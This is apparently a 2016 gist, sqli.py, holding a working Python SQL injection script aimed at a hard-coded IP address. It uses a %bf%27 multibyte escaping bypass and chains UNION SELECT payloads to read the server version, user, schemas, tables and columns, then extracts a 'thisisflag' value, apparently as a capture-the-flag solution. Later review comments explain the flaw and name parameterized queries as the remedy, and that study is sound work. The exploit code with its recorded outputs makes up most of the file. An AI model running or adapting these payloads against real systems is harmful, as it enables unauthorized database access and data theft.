Created
May 15, 2016 03:16
sqli.py
# coding=utf-8 | |
import requests | |
import urllib | |
import re | |
# Captures whatever the response renders between <h1> and </h1>. [\s\S] also
# matches newlines, and the greedy * runs through to the last </h1> in the body.
regex = re.compile(r"<h1>([\s\S]*)</h1>")
r = regex  # second name for the same pattern; not referenced in the visible code

# Hard-coded target with the `id` parameter left open for the payload.
# NOTE(review): the value starts with %bf%27 (byte 0xBF followed by a single
# quote). That looks like the multibyte-charset escaping bypass, where the
# backslash added by addslashes-style escaping is absorbed into a two-byte
# character and the quote stays live -- TODO confirm against the server's
# connection charset. Server-side, the remedy is a parameterized query for
# `id` and a connection charset set through the driver API, not more escaping.
base_url = "http://139.129.166.67/5t5y6huj7j7/?id=%bf%27 "
def get(payload):
    """Request base_url with *payload* appended and return the <h1> captures.

    The payload is formatted as "<payload> -- " (the trailing " -- " is an SQL
    line comment, presumably to cut off the rest of the server-side query),
    percent-encoded with the Python 2 ``urllib.quote`` and concatenated onto
    the module-level ``base_url``. The raw response body is printed, then
    every match of the module-level ``regex`` is returned as a list.
    """
    # NOTE(review): requests.get() is called without a timeout, so an
    # unresponsive server blocks this call indefinitely.
    encoded_tail = urllib.quote("%s -- " % payload)
    body = requests.get(base_url + encoded_tail).content
    print(body)  # one parenthesised argument: same output as the print statement
    return regex.findall(body)
# The triple-quoted block below is an inert string literal: none of it runs.
# It records the queries the author sent one after another, with the value
# each returned noted on the '#' line beneath it (0x74657374 is hex for
# 'test', 0x666c6167 for 'flag').
# NOTE(review): read from the defending side, each step relies on the `id`
# value being spliced into the SQL text and on the query result being echoed
# into the page's <h1>. A parameterized query for `id` removes the first
# condition and with it every step listed here.
'''
print get("union select 1, version()")
# 5.1.73
print get("union select 1, database()")
# test
print get("union select 1, user()")
# shadow@localhost
print get("union select 1, count(*) from information_schema.schemata")
# 2
for i in range(2):
    print get("union select 1, schema_name from information_schema.schemata limit 1 offset %d" % i)
# 'information_schema' 'test'
for i in range(2):
    print get("union select 1, table_name from information_schema.tables where table_schema=0x74657374 limit 1 offset %d" % i)
# 'article' 'flag'
for i in range(5):
    print get("union select 1, column_name from information_schema.columns where table_name=0x666c6167 and table_schema=0x74657374 limit 1 offset %d" % i)
# 'id' 'thisisflag'
'''
# The only statement that executes: read the first row of test.flag through
# get() and print the list of <h1> captures it returns.
print(get(
    "union select 1, convert(thisisflag,char) "
    "from test.flag limit 1 offset 0"
))